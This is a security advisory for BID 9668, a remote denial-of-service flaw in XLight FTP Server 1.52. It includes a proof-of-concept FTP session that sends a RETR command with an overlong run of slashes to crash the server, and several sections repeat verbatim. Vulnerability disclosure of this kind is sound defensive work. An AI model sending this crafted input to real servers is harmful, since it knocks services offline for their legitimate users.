XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
BID:9668
Info
XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
| Bugtraq ID: | 9668 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Feb 16 2004 12:00AM |
| Credit: | Disclosure of this issue has been credited to "intuit e.b." <[email protected]>. |
| Vulnerable: |
XLight FTP Server XLight FTP Server 1.52 |
| Not Vulnerable: | |
Discussion
XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
A remote denial of service vulnerability has been reported to exist in the Send File Request functionality of the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.
Upon successful exploitation an attacker may be able to cause the affected server to crash, denying service to legitimate users.
A remote denial of service vulnerability has been reported to exist in the Send File Request functionality of the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.
Upon successful exploitation an attacker may be able to cause the affected server to crash, denying service to legitimate users.
Exploit / POC
XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.
No exploit is required to leverage this issue. The following proof of concept has been provided:
ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.
Solution / Fix
XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
References:
References:
- Product Homepage (XLight FTP Server)
- Xlight ftp server 1.52 RETR bug ("intuit e.b."